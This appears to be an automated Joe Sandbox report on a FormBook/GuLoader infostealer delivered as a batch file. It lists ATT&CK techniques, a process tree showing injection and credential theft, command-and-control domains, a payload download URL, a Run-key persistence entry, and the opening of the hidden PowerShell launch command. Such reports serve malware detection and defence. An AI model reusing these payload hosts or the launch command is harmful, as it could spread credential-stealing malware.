          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | 1 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 1 Abuse Elevation Control Mechanism | 11 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | 21 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 113 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 1 Registry Run Keys / Startup Folder | 312 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 1 Software Packing | NTDS | 121 Security Software Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 31 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 31 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 312 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          Behavior Graph ID: 1471448 | Sample: rFV-452747284IN.bat | Start date: 11/07/2024 | Architecture: WINDOWS | Score: 100
          Contacted hosts: www.387mfyr.sbs; tejarat-gram.com; econstramedia.com
          Sample-level signatures: Malicious sample detected (through community Yara rule); Yara detected FormBook; Yara detected GuLoader; 4 other signatures
          Process tree (child nodes indented under their parent):
          cmd.exe (started)
            signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found
            powershell.exe (started)
              network: econstramedia.com 103.211.216.55, 443, 49704 PUBLIC-DOMAIN-REGISTRYUS Seychelles
              signatures: Suspicious powershell command line found; Obfuscated command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
              powershell.exe (started)
                signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
                wab.exe (started)
                  network: tejarat-gram.com 185.83.114.124, 443, 49712 HOSTIRAN-NETWORKIR Iran (ISLAMIC Republic Of)
                  signatures: Maps a DLL or memory area into another process
                  nPzDKsDmTWqJ.exe (injected)
                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    clip.exe (started)
                      signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Maps a DLL or memory area into another process; 2 other signatures
                      nPzDKsDmTWqJ.exe (injected)
                        network: www.387mfyr.sbs 137.220.252.40, 49714, 80 BCPL-SGBGPNETGlobalASNSG Singapore
                        signatures: Found direct / indirect Syscall (likely to bypass EDR)
                      firefox.exe (started)
                cmd.exe (started)
                wab.exe (started)
              conhost.exe (started)
              cmd.exe (started)
            conhost.exe (started)
          wab.exe (started)
          wab.exe (started)
          rundll32.exe (started)

          Source | Detection | Scanner | Label | Link
          rFV-452747284IN.bat | 3% | ReversingLabs | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          https://contoso.com/License | 0% | URL Reputation | safe |
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
          https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
          https://contoso.com/ | 0% | URL Reputation | safe |
          https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
          http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
          http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
          http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
          https://go.micro | 0% | URL Reputation | safe |
          https://contoso.com/Icon | 0% | URL Reputation | safe |
          https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
          https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
          https://econstramedia.com/Tegl | 0% | Avira URL Cloud | safe |
          https://aka.ms/pscore68 | 0% | URL Reputation | safe |
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.bin | 0% | Avira URL Cloud | safe |
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
          https://econstramedia.com/ | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrnderier.s | 0% | Avira URL Cloud | safe |
          https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe |
          https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe |
          https://tejarat-gram.com/ | 0% | Avira URL Cloud | safe |
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binO | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrnder | 0% | Avira URL Cloud | safe |
          http://econstramedia.com | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrnd | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrnderier.snpXR | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrnderier | 0% | Avira URL Cloud | safe |
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binnJ | 0% | Avira URL Cloud | safe |
          https://go.mic | 0% | Avira URL Cloud | safe |
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binRhypsPosvilla-ventura.com/cyoeNvCnByBgIccf106.bin | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrnderier. | 0% | Avira URL Cloud | safe |
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binq | 0% | Avira URL Cloud | safe |
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binU | 0% | Avira URL Cloud | safe |
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrnde | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglb | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teg | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrn | 0% | Avira URL Cloud | safe |
          https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrnderier.sn | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrnderie | 0% | Avira URL Cloud | safe |
          https://econstramedia.co | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrnderi | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbr | 0% | Avira URL Cloud | safe |
          http://www.387mfyr.sbs/abt9/?9Z=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==&et=y8bdBnFxh | 0% | Avira URL Cloud | safe |
          https://econstramedia.c | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/T | 0% | Avira URL Cloud | safe |
          https://econstramedia.com | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Te | 0% | Avira URL Cloud | safe |
          https://econstramedia.com/Teglbrnderier.snp | 0% | Avira URL Cloud | safe |
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.387mfyr.sbs | 137.220.252.40 | true | false | | unknown
          tejarat-gram.com | 185.83.114.124 | true | false | | unknown
          econstramedia.com | 103.211.216.55 | true | false | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.bin | false | Avira URL Cloud: safe | unknown
          http://www.387mfyr.sbs/abt9/?9Z=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtO4lYB4JWeqCW78ZirT3u+fANwUiQR/vajzHJfJfY/KmwIA==&et=y8bdBnFxh | false | Avira URL Cloud: safe | unknown
          https://econstramedia.com/Teglbrnderier.snp | false | Avira URL Cloud: safe | unknown
          Name | Source | Malicious | Antivirus Detection | Reputation
          https://duckduckgo.com/chrome_newtab | clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://duckduckgo.com/ac/?q= | clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://econstramedia.com/ | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://contoso.com/License | powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://econstramedia.com/Teglbrnderier.s | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://econstramedia.com/Tegl | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://tejarat-gram.com/ | wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://aka.ms/pscore6lB | powershell.exe, 00000006.00000002.2596172114.00000000041E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binO | wab.exe, 0000000A.00000002.2803376291.0000000005830000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://contoso.com/ | powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://econstramedia.com/Teglbrnder | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://econstramedia.com | powershell.exe, 00000002.00000002.2676908223.000001B101E0D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2676908223.000001B100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2596172114.00000000041E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://econstramedia.com/Teglbrnderier.snpXR | powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2767467645.000001B110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://econstramedia.com/Teglbrnd | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binnJ | wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://go.mic | powershell.exe, 00000006.00000002.2603068995.0000000006D19000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://econstramedia.com/Teglbrnderier | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://go.micro | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://econstramedia.com/Teglbrnderier. | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binq | wab.exe, 0000000A.00000002.2803376291.0000000005830000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://contoso.com/Icon | powershell.exe, 00000006.00000002.2599496258.000000000524A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binRhypsPosvilla-ventura.com/cyoeNvCnByBgIccf106.bin | wab.exe, 0000000A.00000002.2803162062.00000000056D0000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://tejarat-gram.com/cyoeNvCnByBgIccf106.binU | wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://econstramedia.com/Teglbrnde | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://econstramedia.com/Teglb | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://econstramedia.com/Teglbrnderier.sn | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://www.ecosia.org/newtab/ | clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://econstramedia.com/Teg | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2596172114.000000000433C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://ac.ecosia.org/autocomplete?q= | clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://econstramedia.com/Teglbrnderie | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://econstramedia.co | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://econstramedia.com/Teglbrn | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://econstramedia.com/Teglbr | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2676908223.000001B100001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://econstramedia.com/Teglbrnderi | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | clip.exe, 0000000E.00000002.3036314918.0000000007595000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          https://econstramedia.c | powershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp | false
                • Avira URL Cloud: safe
                unknown
                https://econstramedia.compowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2676908223.000001B100477000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2676908223.000001B101D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://econstramedia.com/Tpowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://econstramedia.com/Tepowershell.exe, 00000002.00000002.2676908223.000001B10128D000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.83.114.124 | tejarat-gram.com | Iran (Islamic Republic of) | 59441 | HOSTIRAN-NETWORK (IR) | false
137.220.252.40 | www.387mfyr.sbs | Singapore | 64050 | BCPL-SGBGPNETGlobalASN (SG) | false
103.211.216.55 | econstramedia.com | Seychelles | 394695 | PUBLIC-DOMAIN-REGISTRY (US) | false
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1471448
                Start date and time:2024-07-11 13:11:06 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 32s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:rFV-452747284IN.bat
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winBAT@22/10@3/3
                EGA Information:
                • Successful, ratio: 40%
                HCA Information:
                • Successful, ratio: 84%
                • Number of executed functions: 99
                • Number of non-executed functions: 306
                Cookbook Comments:
                • Found application associated with file extension: .bat
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target nPzDKsDmTWqJ.exe, PID 6192 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 4324 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 7108 because it is empty
• Not all processes were analyzed; report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: rFV-452747284IN.bat
Time | Type | Description
07:11:59 | API Interceptor | 128x Sleep call for process: powershell.exe modified
13:13:14 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FLY4H C:\Program Files (x86)\windows mail\wab.exe
13:13:22 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FLY4H C:\Program Files (x86)\windows mail\wab.exe
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):11608
                Entropy (8bit):4.8908305915084105
                Encrypted:false
                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                Malicious:false
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1940658735648508
                Encrypted:false
                SSDEEP:3:Nlllul/nq/llh:NllUyt
                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                Malicious:false
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\clip.exe
                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                Category:dropped
                Size (bytes):196608
                Entropy (8bit):1.121297215059106
                Encrypted:false
                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                MD5:D87270D0039ED3A5A72E7082EA71E305
                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                Malicious:false
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):433500
                Entropy (8bit):5.974779058415344
                Encrypted:false
                SSDEEP:12288:xFf6UwPO1oFvoX3gPRMPnmmr2xKifPaUR9C:L6PP4o+nGyPmkcjS
                MD5:007CF6A92566BEEAC721341FB07EE93E
                SHA1:8FCB0B9135D89B7CD0D038471BB901C20BEE48B7
                SHA-256:362053D0E47717D018306FF0785C59415A2C7A72A44AA1140103EFE093F584D8
                SHA-512:AAD75AA8B7E967723996369C1D6EA0F3FCED41B6748496B811024CE7202FAB5839290B91222B4CAD71D9DB53F1EFBEAB851132823DA710D6739297A21AD5CD41
                Malicious:false
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6222
                Entropy (8bit):3.7070463597114873
                Encrypted:false
                SSDEEP:96:w2UCOo3kvhkvCCtoCprzXFuHvCprzXFPH0:w2yYoCprgCpry
                MD5:DD57BD1C245456586CDABAE34E206CF7
                SHA1:91DAB822C3E88587252725B54A3F25F98F35E223
                SHA-256:6534FE04F48F4DC578FAF554B69CBC6F1A2E21385CAB83A12AE5B6286DD95108
                SHA-512:06FA00F69704A687879AFC8FF93F4A44E112BB957064A1659F17B663F3E2FD1D42172908EB47E2001409AB9B117AB2B3087921D98D84C184DF0CDF29FB187670
                Malicious:false
                File type:ASCII text, with very long lines (6842), with no line terminators
                Entropy (8bit):5.238110000878595
                TrID:
                  File name:rFV-452747284IN.bat
                  File size:6'842 bytes
                  MD5:4eeae7ac7c9b2b2f6585cbfdb82ffd89
                  SHA1:7978841d26d2be27f6b873a6b3fca3bd999329aa
                  SHA256:96510f0af47cb70914f106bd98fc99b4a5f782c744dbe587368f8614565a6f47
                  SHA512:149edad5906d359b943d24f900c868dca0a65aa305dd571c1cfa28e6eeaec654109ad7013d5ba149fd40c341ac50ff3510297bf390a70269faeb2244a8f5f31c
                  SSDEEP:96:gv/UAWv/UAV1161kylTQdpXxJnSI4ceniGcdZYi8KqYdoTZDm3xMtt8ln9Ex61MV:icHc81xqQTXP/uiG6D8KqYdo1exMzoYV
                  TLSH:6BE14BBAEBFF4628670A0C852DEB46577E08CD37C5768EB69784285C2041618BF2DCDC
                  File Content Preview:start /min powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hoved
                  Icon Hash:9686878b929a9886
Timestamp | Source Port | Dest Port | Source IP | Dest IP
(TCP packet listing between 192.168.2.5:49704 and 103.211.216.55:443, Jul 11, 2024 13:12:01 to 13:12:03 CEST; per-packet rows omitted)
                  Jul 11, 2024 13:12:03.366213083 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.367120028 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.367211103 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.368069887 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.368140936 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.368702888 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.368767023 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.369296074 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.369369984 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.369441032 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.369497061 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.370054960 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.370131016 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.370446920 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.370542049 CEST49704443192.168.2.5103.211.216.55
                  Jul 11, 2024 13:12:03.370699883 CEST44349704103.211.216.55192.168.2.5
                  Jul 11, 2024 13:12:03.370770931 CEST49704443192.168.2.5103.211.216.55
